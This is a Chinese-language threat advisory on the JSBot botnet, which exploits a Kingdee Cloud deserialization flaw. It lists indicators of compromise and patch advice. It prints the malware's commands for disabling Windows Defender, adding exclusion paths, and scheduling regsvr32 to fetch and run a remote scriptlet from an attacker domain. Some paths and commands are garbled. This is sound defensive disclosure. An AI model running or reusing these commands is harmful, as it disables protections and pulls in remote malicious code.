恶意文件名称:
JSBot
威胁类型:
僵尸网络
简单描述:
JSBot是一种利用多种漏洞,善于使用无文件方式加载恶意代码的新型僵尸网络病毒,其具备文件下载、上传、对外DDoS、挖矿、盗取密码等功能,对主机、用户资产危害极大。
事件描述
在近期的安全运营过程中,我们发现JSBot僵尸网络病毒使用某蝶云星空反序列化命令执行漏洞在办公系统内进行传播。
JSBot通过漏洞进入办公系统后,首先会执行一段远程PowerShell代码。
解密后的代码如下。
通过Set-MpPreference -DisableRealtimeMonitoring $true 指令关闭Windows defender的实时文件扫描。
通过Add-MpPreference -ExclusionPath命令将下列目录加入Windows Defender的白名单中。
"C:ProgramDataMicrosoftNetworkConnections"
"C:ProgramDataMicrosoftNetworkDownloader"
"C:ProgramDataMicrosoftWindowsWER"
"C:ProgramDataMicrosoftWindowsWER"
"C:ProgramDataMicrosoftWindowsCaches"
"C:UsersAdministratorAppDataLocalTemp"
再创建多个计划任务,执行远程恶意DLL。
Start -Sleep -Seconds 3 SChTASks /create
/tn('MicrosoftWindowsMUILGRemove')
/tr('regsvr32 /u /s /i:http://cat.xiaoshabi.nl/netstat.xslscrobj.dll')
/sconstart /ru('System')/F
最后通过IEX执行的远程PowerShell代码networks.ps1文件和之前其他厂商披露的基本一致,使用了相同的混淆手法。解密后为该病毒僵尸网络相关模块。
IOC
IP
47[.]101[.]133[.]228
URL
*.dashabi[.]in
*.dashabi[.]nl
*.xiaojiji[.]nl
*.xiaoshabi[.]nl
safe[.]lxb[.]monster
解决方案
漏洞处置建议
官方已经发布最新补丁修改该漏洞,请受影响的用户及时更新最新补丁,参考链接:
https://vip.kingdee.com/article/388994085484889344?productLineId=1&isKnowledge=2
病毒处置建议
原文始发于微信公众号(深信服千里目安全技术中心):【恶意文件】JSBot僵尸网络病毒在野攻击安全事件通告
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论